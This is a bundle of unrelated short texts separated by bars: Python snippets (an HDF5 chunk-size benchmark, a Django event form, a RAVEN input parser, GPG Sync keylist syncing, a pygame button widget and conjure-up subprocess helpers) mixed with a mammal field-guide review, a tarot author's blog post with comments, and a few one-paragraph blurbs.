precision = 10. ** -least_significant_digit
exp = math.log(precision, 10)
if exp < 0:
exp = int(math.floor(exp))
else:
exp = int(math.ceil(exp))
bits = math.ceil(math.log(10. ** -exp, 2))
scale = 2. ** bits
return numpy.around(scale * data) / scale
def get_db_size(filename):
sout = subprocess.Popen("ls -sh %s" % filename, shell=True,
stdout=subprocess.PIPE).stdout
line = [l for l in sout][0]
return line.split()[0]
def bench(chunkshape, filters):
numpy.random.seed(1) # to have reproductible results
filename = tempfile.mktemp(suffix='.h5')
print("Doing test on the file system represented by:", filename)
f = tables.open_file(filename, 'w')
e = f.create_earray(f.root, 'earray', datom, shape=(0, M),
filters = filters,
chunkshape = chunkshape)
# Fill the array
t1 = time()
for i in range(N):
# e.append([numpy.random.rand(M)]) # use this for less compressibility
e.append([quantize(numpy.random.rand(M), 6)])
# os.system("sync")
print("Creation time:", round(time() - t1, 3), end=' ')
filesize = get_db_size(filename)
filesize_bytes = os.stat(filename)[6]
print("\t\tFile size: %d -- (%s)" % (filesize_bytes, filesize))
# Read in sequential mode:
e = f.root.earray
t1 = time()
# Flush everything to disk and flush caches
#os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
for row in e:
t = row
print("Sequential read time:", round(time() - t1, 3), end=' ')
# f.close()
# return
# Read in random mode:
i_index = numpy.random.randint(0, N, 128)
j_index = numpy.random.randint(0, M, 256)
# Flush everything to disk and flush caches
#os.system("sync; echo 1 > /proc/sys/vm/drop_caches")
# Protection against too large chunksizes
# 4 MB
if 0 and filters.complevel and chunkshape[0] * chunkshape[1] * 8 > 2 ** 22:
f.close()
return
t1 = time()
for i in i_index:
for j in j_index:
t = e[i, j]
print("\tRandom read time:", round(time() - t1, 3))
f.close()
# Benchmark with different chunksizes and filters
# for complevel in (0, 1, 3, 6, 9):
for complib in (None, 'zlib', 'lzo', 'blosc'):
# for complib in ('blosc',):
if complib:
filters = tables.Filters(complevel=5, complib=complib)
else:
filters = tables.Filters(complevel=0)
print("8<--" * 20, "\nFilters:", filters, "\n" + "-" * 80)
# for ecs in (11, 14, 17, 20, 21, 22):
for ecs in range(10, 24):
# for ecs in (19,):
chunksize = 2 ** ecs
chunk1 = 1
chunk2 = chunksize / datom.itemsize
if chunk2 > M:
chunk1 = chunk2 / M
chunk2 = M
chunkshape = (chunk1, chunk2)
cs_str = str(chunksize / 1024) + " KB"
print("***** Chunksize:", cs_str, "/ Chunkshape:", chunkshape, "*****")
bench(chunkshape, filters)
|
If I have to worship something, I'll take the mammals. After all, they were the first things humans worshipped, and it seems right that after a few deluded centuries of praying to Gods who were just mean old men, we come back to the joyful polytheism of our ancestors, whose greatest wish was to be transformed into a deer, wolf or bear. The mammal cult has been making steady progress, slipping under the cultural radar. Every Gary Larson cartoon is another vote for the mammals, as is every dorm room with orca or wolf posters. There's an ideological mass reaching the critical point here, ready to force its way through the standard pieties.
But it needs some help in the print propaganda department, because it's amazingly difficult to find a good guide to the world's mammals. Instead, all you find is shelves full of books about birds. I'm not taking anything away from the birds. I'm not saying they're a bunch of showboating leftover dinosaurs with a T. Rex complex, strutting their plumes in the certainty that they can fly away if anything serious happens. Nor am I suggesting that their corny nest-building activity is a specious testimony to the middle-class nuclear family, reassuring suburbanites that the sitcom order of life is rooted in Nature.
All I'm saying is, how about a little mammal solidarity here?
It's coming, though too slowly. It's coalescing; you can see it in the way people react to news items. For example, there was a great story last week about some marine biologists in Point Reyes watching a mother Orca attack and kill a Great White Shark, then use the corpse to teach her calf to feed. Everybody I told about that story had the same reaction: "Yay! Yay for her!" That's mammal solidarity, and Mammals should serve as the new/old creed's holy scripture.
Mammals is one of a series of handbooks put together in a very efficient, readable format by the English publishers Dorling Kindersley. In less than 400 pages, you get brief, punchy descriptions and photos of over 450 species of mammal, with information on the diet, social unit, gestation period and family tree of each. Most important, you also get a report on the status of the species, from "common" to "critically endangered."
Open this book at random and you're guaranteed to find something wonderful. I happened to open it to page 181, and found a picture of what may well be the ugliest mammal extant, the Naked Mole Rat. The species description was astonishing: "With hairless, loose pinkish-grey skin and vestigial ears and minute eyes, this unusual looking, nocturnal rodent has a unique social system. It lives in colonies of 70-80, with a dominant female 'queen' that breeds and is tended by several non-workers, while the workers form head-to-tail digging chains in food-gathering galleries that radiate up to 40m (130 ft) from the central chamber."
I thought I knew mammals pretty well -- I was one of those kids who took the nature documentaries very seriously -- and I'd heard of the Mole Rat a few times, but I had no idea it lived in a queen-centered underground colony, like ants and termites do. That's the sort of delightful shock you encounter on nearly every page of this book. You come away awed by the sheer versatility of us hairy little milk-sucking adventurists.
For example, I had no idea there were so many gliding mammals. Not "flying"; bats are the only mammals who actually fly; but gliding on skin membranes through virtually all the forests of Earth, from New York to Borneo. The Malayan Flying Lemur, the best glider in Mammalia, can swoop 330 feet between trees without losing altitude. The Giant Flying Squirrel glides from Eastern Afghanistan to Borneo -- not in one glide, you understand -- by opening its blanket-like membrane, an animate flying carpet half a meter long. God, they're all so incredibly great! And there are hundreds of these gliders! Yet without a book like this we'd never know about them, because they're very quiet, and of course humans rarely look up.
|
from django.forms import *
from django.forms.widgets import *
from django.forms.extras.widgets import *
from vizwall.events.models import Event, COMPONENT_CHOICES, dTimeFieldInputs
import datetime
from vizwall.accounts.models import UserProfile
from captcha.fields import CaptchaField
class EventForm(ModelForm):
'''Event form, customized to show normal Anonymous view'''
event_date = DateTimeField(required=True, initial=None, input_formats=dTimeFieldInputs, help_text='Please use the date selector and check the calendar for available times!')
captcha = CaptchaField()
class Meta:
model = Event
#fields = ()
exclude=('event_last_modified', 'event_req_date',
'event_pub_date', 'event_is_published', 'event_assigned_proctors',
'event_is_declined')
widgets = {
'event_detail': Textarea(attrs={'cols':35, 'rows': 5}),
'event_components_vizwall': CheckboxInput(),
'event_components_3dtv': CheckboxInput(),
'event_components_omni': CheckboxInput(),
'event_components_hd2': CheckboxInput(),
'event_components_smart': CheckboxInput(),
}
def __init__(self, *args, **kwargs):
self.event_id = kwargs.pop('event_id') if kwargs.get('event_id') else None
super(EventForm, self).__init__(*args, **kwargs)
def clean_event_component_vizwall(self):
if self.cleaned_data['event_component_vizwall']:
return True
return False
def clean_event_component_omni(self):
if self.cleaned_data['event_component_omni']:
return True
return False
def clean_event_component_3dtv(self):
if self.cleaned_data['event_component_3dtv']:
return True
return False
def clean_event_component_hd2(self):
if self.cleaned_data['event_component_hd2']:
return True
return False
def clean_event_component_smart(self):
if self.cleaned_data['event_component_smart']:
return True
return False
def clean_event_date(self):
''' Checks requested date against any current events for conflicts
raises an error if another published event exists, else passes validation'''
reqDate = self.cleaned_data['event_date']
reqDuration = self.cleaned_data['event_duration']
conflict = self.checkConflict(reqDate, reqDuration)
if conflict and conflict.pk != self.event_id:
raise forms.ValidationError("This event Conflicts with another event: \"%s\" between %s-%s - ID# %s" % ('\n'+conflict.event_title, conflict.event_date.strftime('%H:%M'), conflict.get_end_date().strftime('%H:%M'), conflict.pk))
# always return the cleaned data, whether it was changed or not
return reqDate
def inRange(self,begin,duration,eventStart,eventDuration):
''' Checks if date ranges overlap - pads 1 minute off end times'''
end = begin + datetime.timedelta(minutes=duration-1)
eventEnd = eventStart + datetime.timedelta(minutes=int(eventDuration)-1)
#print begin, end
#print eventStart, eventEnd
isInRange = begin <= eventStart <= end or begin <= eventEnd <= end
return isInRange
def checkConflict(self, reqDate, reqDuration):
'''checks current scheduled and published events if there is a conflict '''
tom = reqDate+datetime.timedelta(days=2) # make sure full day tomorrow is included
if self.event_id:
print "event_id given"
daysEvents = Event.objects.all().filter(
event_date__gte=datetime.date(reqDate.year,reqDate.month,reqDate.day),
event_date__lte=datetime.date(tom.year,tom.month,tom.day),
event_is_published=True).exclude(pk=self.event_id)
print daysEvents
else:
print "event_id not given"
daysEvents = Event.objects.all().filter(
event_date__gte=datetime.date(reqDate.year,reqDate.month,reqDate.day),
event_date__lte=datetime.date(tom.year,tom.month,tom.day),
event_is_published=True)
if daysEvents:
for event in daysEvents:
if self.inRange(event.event_date, event.event_duration, reqDate, reqDuration):
# conflict exists, return with conflicting event (~bool True)
return event
# no conflicts, valid event time, return with nothing (~bool False)
return False
class DynamicMultipleChoiceField(MultipleChoiceField):
''' Removes default django validation that values are in choices option '''
def validate(self, value):
if self.required and not value:
raise forms.ValidationError(self.error_messages['required'])
class EventFormAdmin(EventForm):
class Meta:
model=Event
exclude=('event_pub_date', 'event_req_date', 'event_last_modified', 'event_assigned_proctors', 'captcha')
widgets = {
'event_detail': Textarea(attrs={'cols':35, 'rows':5}),
'event_components_vizwall': CheckboxInput(),
'event_components_3dtv': CheckboxInput(),
'event_components_omni': CheckboxInput(),
'event_components_hd2': CheckboxInput(),
'event_components_smart': CheckboxInput(),
'event_is_published': CheckboxInput(),
'event_is_declined': CheckboxInput(),
}
# representing the manytomany related field in Event
proctors = DynamicMultipleChoiceField(required=False)
def clean_proctors(self):
return self.cleaned_data['proctors']
|
Chicago Daily Law Bulletin: What types of pro bono work do you do?
For Chuhak & Tecson principal Dan Fumagalli, pro bono work is an important part of his practice. Find out what type of pro bono work he does in a recent Chicago Daily Law Bulletin Q&A.
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Mar 10, 2015
@author: talbpaul
"""
from __future__ import division, print_function, unicode_literals, absolute_import
import os
import sys
import numpy as np
from utils import mathUtils
# numpy with version 1.14.0 and upper will change the floating point type and print
# https://docs.scipy.org/doc/numpy-1.14.0/release.html
if int(np.__version__.split('.')[1]) > 13:
np.set_printoptions(**{'legacy':'1.13'})
def _reprIfFloat(value):
"""
Uses repr if the value is a float
@ In, value, any, the value to convert to a string
@ Out, _reprIfFloat, string, a string conversion of this
"""
if mathUtils.isAFloat(value):
return repr(value)
else:
return str(value)
class GenericParser():
"""
import the user-edited input file, build list of strings with replacable parts
"""
def __init__(self,inputFiles,prefix='$RAVEN-',postfix='$',defaultDelim=':', formatDelim='|'):
"""
Accept the input file and parse it by the prefix-postfix breaks. Someday might be able to change prefix,postfix,defaultDelim from input file, but not yet.
@ In, inputFiles, list, string list of input filenames that might need parsing.
@ In, prefix, string, optional, the string prefix to find input variables within the input files
@ In, postfix, string, optional, the string postfix signifying hte end of an input variable within an input file
@ In, defaultDelim, string, optional, the string used between prefix and postfix to set default values
@ In, formatDelim, string, optional, the string used between prefix and postfix to set the format of the value
@ Out, None
"""
self.inputFiles = inputFiles
self.prefixKey=prefix
self.postfixKey=postfix
self.varPlaces = {} # varPlaces[var][inputFile]
self.defaults = {} # defaults[var][inputFile]
self.formats = {} # formats[var][inputFile]
self.acceptFormats = {"d":int,"e":float,"E":float,"f":float,"F":float,"g":float,"G":float}
self.segments = {} # segments[inputFile]
self.printTag = 'GENERIC_PARSER'
for inputFile in self.inputFiles:
infileName = inputFile.getFilename()#os.path.basename(inputFile)
self.segments[infileName] = []
if not os.path.exists(inputFile.getAbsFile()):
## Make sure to cast the inputFile to a string as it may be File object.
raise IOError('Input file not found: ' + str(inputFile))
seg = ''
lines = inputFile.readlines()
inputFile.close()
for line in lines:
while self.prefixKey in line and self.postfixKey in line:
self.segments[infileName].append(seg)
start = line.find(self.prefixKey)
end = line.find(self.postfixKey,start+1)
var = line[start+len(self.prefixKey):end]
if defaultDelim in var or formatDelim in var:
optionalPos = [None]*2
optionalPos[0], optionalPos[1] = var.find(defaultDelim), var.find(formatDelim)
if optionalPos[0] == -1:
optionalPos[0] = sys.maxsize
if optionalPos[1] == -1:
optionalPos[1] = sys.maxsize
defval = var[optionalPos[0]+1:min(optionalPos[1],len(var))] if optionalPos[0] < optionalPos[1] else var[min(optionalPos[0]+1,len(var)):len(var)]
varformat = var[min(optionalPos[1]+1,len(var)):len(var)] if optionalPos[0] < optionalPos[1] else var[optionalPos[1]+1:min(optionalPos[0],len(var))]
var = var[0:min(optionalPos)]
if var in self.defaults.keys() and optionalPos[0] != sys.maxsize:
print('multiple default values given for variable',var)
if var in self.formats.keys() and optionalPos[1] != sys.maxsize:
print('multiple format values given for variable',var)
#TODO allow the user to specify take-last or take-first?
if var not in self.defaults.keys() and optionalPos[0] != sys.maxsize:
self.defaults[var] = {}
if var not in self.formats.keys() and optionalPos[1] != sys.maxsize:
self.formats[var ] = {}
if optionalPos[0] != sys.maxsize:
self.defaults[var][infileName]=defval
if optionalPos[1] != sys.maxsize:
# check if the format is valid
if not any(formVal in varformat for formVal in self.acceptFormats.keys()):
try:
int(varformat)
except ValueError:
raise ValueError("the format specified for wildcard "+ line[start+len(self.prefixKey):end] +
" is unknown. Available are either a plain integer or the following "+" ".join(self.acceptFormats.keys()))
self.formats[var][infileName ]=varformat,int
else:
for formVal in self.acceptFormats.keys():
if formVal in varformat:
self.formats[var][infileName ]=varformat,self.acceptFormats[formVal]; break
self.segments[infileName].append(line[:start])
self.segments[infileName].append(var)
if var not in self.varPlaces.keys():
self.varPlaces[var] = {infileName:[len(self.segments[infileName])-1]}
elif infileName not in self.varPlaces[var].keys():
self.varPlaces[var][infileName]=[len(self.segments[infileName])-1]
else:
self.varPlaces[var][infileName].append(len(self.segments[infileName])-1)
#self.segments.append(line[end+1:])
line=line[end+1:]
seg = ''
else:
seg+=line
self.segments[infileName].append(seg)
def modifyInternalDictionary(self,**Kwargs):
"""
Edits the parsed file stored in self.segments to enter new variable values preperatory to a new run.
@ In, **Kwargs, dict, dict including moddit (the dictionary of variable:value to replace) and additionalEdits.
@ Out, None
"""
modDict = Kwargs['SampledVars']
self.adlDict = Kwargs.get('additionalEdits',{})
ioVars = []
for value in self.adlDict.values():
if type(value)==dict:
for k in value.keys():
ioVars.append(k)
elif type(value)==list:
for v in value:
ioVars.append(v)
else:
ioVars.append(value)
for var in self.varPlaces.keys():
for inputFile in self.segments.keys():
for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
if var in modDict.keys():
if var in self.formats.keys():
if inputFile in self.formats[var].keys():
if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](modDict[var]))
else:
self.segments[inputFile][place] = _reprIfFloat(modDict[var]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
else:
self.segments[inputFile][place] = _reprIfFloat(modDict[var])
elif var in self.defaults.keys():
if var in self.formats.keys():
if inputFile in self.formats[var].keys():
if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](self.defaults[var][inputFile]))
else:
self.segments[inputFile][place] = _reprIfFloat(self.defaults[var][inputFile]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
else:
self.segments[inputFile][place] = self.defaults[var][inputFile]
elif var in ioVars:
continue #this gets handled in writeNewInput
else:
raise IOError('Generic Parser: Variable '+var+' was not sampled and no default given!')
def writeNewInput(self,inFiles,origFiles):
"""
Generates a new input file with the existing parsed dictionary.
@ In, inFiles, list, Files list of new input files to return
@ In, origFiles, list, the original list of Files, used for key names
@ Out, None
"""
#get the right IO names put in
case = 'out~'+inFiles[0].getBase() #FIXME the first entry? This is bad! Forces order somewhere in input file
# however, I can't seem to generate an error with this, so maybe it's okay
def getFileWithExtension(fileList,ext):
"""
Just a script to get the file with extension ext from the fileList.
@ In, fileList, list, the Files list of files to pick from.
@ In, ext, string, the string extension that the desired filename ends with.
@ Out, None
"""
found=False
for index,inputFile in enumerate(fileList):
if inputFile.getExt() == ext:
found=True
break
if not found:
raise IOError('No InputFile with extension '+ext+' found!')
return index,inputFile
for var in self.varPlaces.keys():
for inputFile in self.segments.keys():
for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
for iotype,adlvar in self.adlDict.items():
if iotype=='output':
if var==self.adlDict[iotype]:
self.segments[inputFile][place] = case
break
elif iotype=='input':
if var in self.adlDict[iotype].keys():
self.segments[inputFile][place] = getFileWithExtension(inFiles,self.adlDict[iotype][var][0].strip('.'))[1].getAbsFile()
break
#now just write the files.
for f,inFile in enumerate(origFiles):
outfile = inFiles[f]
#if os.path.isfile(outfile.getAbsFile()): os.remove(outfile.getAbsFile())
outfile.open('w')
outfile.writelines(''.join(self.segments[inFile.getFilename()]))
outfile.close()
|
I am home again from the Massachusetts "Seasons of Witchery" tour and it went great! My husband Ken, and I took the last day and played tourist and visited Gloucester and Rockport Massachusetts. Yes indeed we had lob-stah rolls for lunch! In a fun restaurant on the water- where we watched the lobster boats coming in with their catch. Here is a picture of us at the beach in Rockport.
I have spent the past few days catching back up on correspondence and paperwork, and things are starting to settle down. I have new orders for Garden Witch Pentacles to fill, and some 2014 Llewellyn annual articles to write. (It keeps me busy while I wait to hear about my latest book proposal to Llewellyn.) Fingers crossed.
Today I posted a snapshot of the Witches Tarot book, the card back and a sampling of the cards on Facebook. here is the picture.The boxed sets just hit the Llewellyn warehouse last week. So they will be all ready to go on September 8th on the official release day!
Recently I saw a post on the Llewellyn blog, from a person complaining that the Witches Tarot deck lacked "diversity" and was nothing but "white people".
This yanked my chain for a couple of reasons. First and foremost because it is simply not the case. So, I took a deep breath and politely responded, informing the post-ee that they were incorrect.
The angel in the Lovers card is in fact- Asian.
Furthermore, Themis who is portrayed in the Justice Major Arcana card, (Pictured to the right) has gorgeous caramel/ golden colored skin and black curly hair with highlights.
I invited the person to take a closer look at the Witches Tarot Facebook page where they could see a large image of the Page of Pentacles, who is stunning and who is- by the way- a young woman of color.
I also noted that the 3 of Pentacles, the Knight of Pentacles, and the Queen of Pentacles are all beautiful people of color. Actually the 3 of Pentacles is one of my favorite cards in the entire deck! There is a sorcerer's apprentice vibe to this particular card. Just wait until you see him!
Honestly when I designed and scripted the Witches Tarot it only made sense to me to have some diversity in the deck art. The artist Mark, and I had several conversations about this topic.
To my delight I noticed when I came back from touring there was a new post on the Llewellyn blog. Where the person noted that they had gone and looked at the website and the Facebook pages. That they were "super pleased", and then they added,"Thanks, I am glad I was wrong about that!"
I am thrilled that they took the time to look again and are happy with what they see.
Just today I found a lovely comment on the card image of the Page of Pentacles, from a Facebook follower thanking me, "for including brown-skinned Witches in the deck!" That their favorite decks "are the ones that represent people of all ethnicities in them." Which just made my day.
Witches come in all beautiful shapes, sizes, and colors. I hope that with the Witches Tarot deck, everyone will find something to relate to and identify with. So they can make it their own.
May the Mother Goddess smile down on us, reminding us that we are indeed all her children!
The cards are really gorgeous. Great work !
Have a magical day and I hope Llewellyn will accept your book proposal.
There is always going to be someone just itching to complain about everything. At least this person checked back and revised his/her stance. I finally broke down and ordered the deck. Can't wait to see them and get a feel for using them.
The design on the back will make reversed cards stand out. This puts me off the deck.
Well, it takes courage to admit you're wrong (especially in such an anonymous environment such as the internet) so it's nice that they took the time to reflect on their opinion.
This is really a beautiful deck of cards. I love to buy this deck of Tarot cards.
You have a nice psychic site here, I like the color and positive energy you put into it. Great work.
|
# -*- coding: utf-8 -*-
"""
GPG Sync
Helps users have up-to-date public keys for everyone in their organization
https://github.com/firstlookmedia/gpgsync
Copyright (C) 2016 First Look Media
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import queue
import threading
import time
import sys
from .keylist import Keylist, RefresherMessageQueue
def worker(common, keylist, force, status):
"""
Sync a single keylist, to be run in a separate thread
"""
cancel_q = queue.Queue()
result = Keylist.refresh(common, cancel_q, keylist, force=force)
keylist.interpret_result(result)
status[keylist.id]['result'] = result
def sync(common, force=False):
"""
Sync all keylists.
"""
print("GPG Sync {}\n".format(common.version))
num_keylists = len(common.settings.keylists)
# Status is a dictionary where keys are the keylist "id", a
# concatination of the keylist URL and fingerprint
status = {}
ids = [] # ordered list of ids
# Build the status object, and display keylist indexes
for i in range(num_keylists):
keylist = common.settings.keylists[i]
keylist.id = keylist.fingerprint + b':' + keylist.url
ids.append(keylist.id)
status[keylist.id] = {
"index": i,
"event": None,
"str": None,
"result": None,
"keylist": keylist
}
print("[{}] Keylist {}, with authority key {}".format(i, keylist.url.decode(), keylist.fingerprint.decode()))
print("")
# Start threads
threads = []
for keylist in common.settings.keylists:
keylist.q = RefresherMessageQueue()
t = threading.Thread(target=worker, args=(common, keylist, force, status,))
threads.append(t)
t.start()
# Monitor queues for updates
while True:
# Process the last event in the LIFO queues
for keylist in common.settings.keylists:
try:
event = keylist.q.get(False)
if event['status'] == RefresherMessageQueue.STATUS_IN_PROGRESS:
status[keylist.id]['event'] = event
except queue.Empty:
pass
# Display
for id in ids:
if not status[id]['event']:
status[id]['str'] = '[{0:d}] Syncing...'.format(status[id]['index'])
else:
percent = (status[id]['event']['current_key'] / status[id]['event']['total_keys']) * 100;
status[id]['str'] = '[{0:d}] {1:d}/{2:d} ({3:d}%)'.format(
status[id]['index'],
status[id]['event']['current_key'],
status[id]['event']['total_keys'],
int(percent))
sys.stdout.write('{} \r'.format(' '.join([status[id]['str'] for id in ids])))
# Are all keylists finished syncing?
done = True
for id in ids:
if not status[id]['result']:
done = False
break
if done:
sys.stdout.write('\n\n')
break
else:
# Wait a bit before checking for updates again
time.sleep(1)
# Make sure all threads are finished
for t in threads:
t.join()
# Display the results
for id in ids:
result = status[id]['result']
keylist = status[id]['keylist']
if result['type'] == 'success':
if keylist.warning:
print("[{0:d}] Sync successful. Warning: {1:s}".format(status[id]['index'], keylist.warning))
else:
print("[{0:d}] Sync successful.".format(status[id]['index']))
elif result['type'] == 'error':
print("[{0:d}] Sync failed. Error: {1:s}".format(status[id]['index'], keylist.error))
elif result['type'] == 'cancel':
print("[{0:d}] Sync canceled.".format(status[id]['index']))
elif result['type'] == 'skip':
print("[{0:d}] Sync skipped. (Use --force to force syncing.)".format(status[id]['index']))
else:
print("[{0:d}] Unknown problem with sync.".format(status[id]['index']))
|
That building there is an actual building in Redding (I know STX got the image for it from Google Maps) called the SMART Center, a place to help people find a job (where she's dropping down is the other side of the building where the Department of Health and Social Services is). That officially makes the bank that was robbed be the Bank of America in downtown Redding. Just thought that information would be interesting.
|
from __future__ import absolute_import
import os
import pygame
from pygameui.widget import Widget
buttonbgpath = os.path.join("images", "gui", "buttonbg.png")
class Button(Widget):
"""Button Widget
"""
def __init__(self, label, position, bgimage=None, labelsize=12,
color=(255, 255, 0)):
self.bgimage = bgimage
self.label = label
self.color = color
self.position = position
self.labelsize = labelsize
self.labelfont = pygame.font.Font("dejavusansmono.ttf", self.labelsize)
self.buttonbgorg = pygame.image.load(buttonbgpath).convert_alpha()
self.buttonbg = self.buttonbgorg.copy()
# Setup image
if not self.bgimage:
self._settextimage()
else:
self._setsize(self._calculate_size(self.bgimage))
Widget.__init__(self, self.position, self.width, self.height)
def _render_text(self):
"""_render_text
:return:
"""
img = self.labelfont.render(self.label, 0, self.color)
return img.convert_alpha()
@staticmethod
def _calculate_size(image):
"""_calculate_size
:param image:
:return:
"""
width = image.get_size()[0] + 4
height = image.get_size()[1]
return (width, height)
def _settextimage(self):
"""_set text image
:return:
"""
self.image = self._render_text()
self._setsize(self._calculate_size(self.image))
def setimage(self, newimage):
"""set image
:param newimage:
:return:
"""
self.image = newimage
self._setsize(self._calculate_size(self.image))
self.repaint()
def repaint(self):
"""repaint
:return:
"""
self.create_widget_image()
if self.label and self.bgimage:
img = self._render_text()
self.img.blit(img, (2, 0))
self.img.blit(self.bgimage, (0, 0))
elif not self.bgimage:
img = pygame.transform.smoothscale(self.buttonbgorg, self.size)
self.buttonbg = img
self.img.blit(self.buttonbg, (0, 0))
self.img.blit(self.image, (2, 0))
elif not self.label and self.bgimage:
self.img.blit(self.bgimage, (0, 0))
# draw rectangle on hover
if self.insidewidget:
pygame.draw.line(self.img, self.color, (1, self.height - 1),
(self.width, self.height - 1))
# mark modified
self.mark_modified()
def settext(self, newtext):
"""settext
:param newtext:
:return:
"""
self.label = newtext
self._settextimage()
self.repaint()
def poll_event(self, event):
"""poll_event
:param event:
:return:
"""
Widget.poll_event(self, event)
pos = self.parent.get_relative_mousepos()
# mouse button down
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and pos\
and self.pointinwidget(pos[0], pos[1]):
# on_click event
self.call_callback("clicked")
self.call_callback("onclick")
# make button active
if self.parent:
self.parent.makeactive(self)
|
Represents an Alpha Ceiling effect. Alpha (opacity) values greater than zero are changed to 100%. In other words, anything partially opaque becomes fully opaque.
|
import asyncio
import codecs
import errno
import json
import logging
import os
import pty
import re
import shutil
import socket
import subprocess
import sys
import uuid
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from itertools import chain
from pathlib import Path
from subprocess import PIPE, Popen, check_call, check_output
import aiofiles
from pkg_resources import parse_version
from raven.processors import SanitizePasswordsProcessor
from termcolor import cprint
from conjureup import consts
from conjureup.app_config import app
from conjureup.models.metadata import SpellMetadata
from conjureup.telemetry import track_event
@contextmanager
def chdir(directory):
"""Change the current working directory to a different directory for a code
block and return the previous directory after the block exits. Useful to
run commands from a specificed directory.
:param str directory: The directory path to change to for this context.
"""
cur = os.getcwd()
try:
yield os.chdir(directory)
finally:
os.chdir(cur)
def run(cmd, **kwargs):
""" Compatibility function to support python 3.4
"""
try:
from subprocess import run as _run
return _run(cmd, **kwargs)
except ImportError:
if 'check' in kwargs:
del kwargs['check']
return check_call(cmd, **kwargs)
else:
return check_output(cmd, **kwargs)
def run_script(path, stderr=PIPE, stdout=PIPE):
return run(path, shell=True, stderr=stderr, stdout=stdout, env=app.env)
def run_attach(cmd, output_cb=None):
""" run command and attach output to cb
Arguments:
cmd: shell command
output_cb: where to display output
"""
stdoutmaster, stdoutslave = pty.openpty()
subproc = Popen(cmd, shell=True,
stdout=stdoutslave,
stderr=PIPE)
os.close(stdoutslave)
decoder = codecs.getincrementaldecoder('utf-8')()
def last_ten_lines(s):
chunk = s[-1500:]
lines = chunk.splitlines(True)
return ''.join(lines[-10:]).replace('\r', '')
decoded_output = ""
try:
while subproc.poll() is None:
try:
b = os.read(stdoutmaster, 512)
except OSError as e:
if e.errno != errno.EIO:
raise
break
else:
final = False
if not b:
final = True
decoded_chars = decoder.decode(b, final)
if decoded_chars is None:
continue
decoded_output += decoded_chars
if output_cb:
ls = last_ten_lines(decoded_output)
output_cb(ls)
if final:
break
finally:
os.close(stdoutmaster)
if subproc.poll() is None:
subproc.kill()
subproc.wait()
errors = [l.decode('utf-8') for l in subproc.stderr.readlines()]
if output_cb:
output_cb(last_ten_lines(decoded_output))
errors = ''.join(errors)
if subproc.returncode == 0:
return decoded_output.strip()
else:
raise Exception("Problem running {0} "
"{1}:{2}".format(cmd,
subproc.returncode))
async def arun(cmd, input=None, check=False, env=None, encoding='utf8',
stdin=PIPE, stdout=PIPE, stderr=PIPE, cb_stdout=None,
cb_stderr=None, **kwargs):
""" Run a command using asyncio.
If ``stdout`` or ``stderr`` are strings, they will treated as filenames
and the data from the proces will be written (streamed) to them. In this
case, ``cb_stdout`` and ``cb_stderr`` can be given as callbacks to call
with each line from the respective handle.
:param list cmd: List containing the command to run, plus any args.
:param dict **kwargs:
"""
env = dict(app.env, **(env or {}))
outf = None
errf = None
try:
if isinstance(stdout, str):
outf = await aiofiles.open(stdout, 'w')
stdout = PIPE
if isinstance(stderr, str):
errf = await aiofiles.open(stderr, 'w')
stderr = PIPE
proc = await asyncio.create_subprocess_exec(*cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
env=env,
**kwargs)
data = {}
async def tstream(source_name, sink, ui_cb):
source = getattr(proc, source_name)
while proc.returncode is None:
async for line in source:
line = line.decode(encoding)
if ui_cb:
ui_cb(line)
data.setdefault(source_name, []).append(line)
if sink:
await sink.write(line)
await sink.flush()
await asyncio.sleep(0.01)
tasks = []
if input:
if isinstance(input, str):
input = input.encode(encoding)
tasks.append(proc._feed_stdin(input))
if proc.stdout:
tasks.append(tstream('stdout', outf, cb_stdout))
if proc.stderr:
tasks.append(tstream('stderr', errf, cb_stderr))
await asyncio.gather(*tasks)
await proc.wait()
finally:
if outf:
await outf.close()
if errf:
await errf.close()
stdout_data = ''.join(data.get('stdout', [])) if proc.stdout else None
stderr_data = ''.join(data.get('stderr', [])) if proc.stderr else None
if check and proc.returncode != 0:
raise subprocess.CalledProcessError(proc.returncode,
cmd, stdout_data, stderr_data)
return (proc.returncode, stdout_data, stderr_data)
def sentry_report(message=None, exc_info=None, tags=None, **kwargs):
app.loop.run_in_executor(None, partial(_sentry_report,
message, exc_info, tags, **kwargs))
def _sentry_report(message=None, exc_info=None, tags=None, **kwargs):
if app.no_report:
return
try:
default_tags = {
'spell': app.config.get('spell'),
'cloud_type': app.provider.cloud_type if app.provider else None,
'region': app.provider.region if app.provider else None,
'jaas': app.is_jaas,
'headless': app.headless,
'juju_version': juju_version()
}
if message is not None and exc_info is None:
event_type = 'raven.events.Message'
kwargs['message'] = message
if 'level' not in kwargs:
kwargs['level'] = logging.WARNING
else:
event_type = 'raven.events.Exception'
if exc_info is None or exc_info is True:
kwargs['exc_info'] = sys.exc_info()
else:
kwargs['exc_info'] = exc_info
if 'level' not in kwargs:
